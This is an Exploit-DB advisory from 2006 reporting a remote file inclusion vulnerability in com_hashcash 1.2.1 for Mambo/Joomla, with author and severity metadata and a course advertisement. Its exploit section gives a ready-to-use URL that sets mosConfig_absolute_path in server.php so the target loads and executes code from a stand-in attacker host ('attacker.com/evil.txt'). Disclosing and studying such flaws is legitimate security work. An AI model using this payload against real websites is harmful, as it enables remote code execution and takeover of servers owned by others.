Mambo Component com_hashcash 1.2.1 - Remote File Inclusion

EDB-ID:

2026


Author:

Matdhule

Type:

webapps


Platform:

PHP

Date:

2006-07-17


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Hashcash Component

Author          : Ahmad Maulana a.k.a Matdhule
Date            : July 12th 2006
Location        : Indonesia, Jakarta
Web             : http://advisories.echo.or.id/adv/adv38-matdhule-2006.txt
Critical Lvl    : Highly critical
Impact          : System access
Where           : From Remote
------------------------------------------------------------------------ 

Application     : com_hashcash Component
version         : 1.2.1
URL             : http://developer.joomla.org/sf/frs/do/viewRelease/projects.com_hashcash/frs.components.com_hashcash

Exploit:
http://[target]/[path]/components/com_hashcash/server.php?mosConfig_absolute_path= http://attacker.com/evil.txt?

# milw0rm.com [2006-07-17]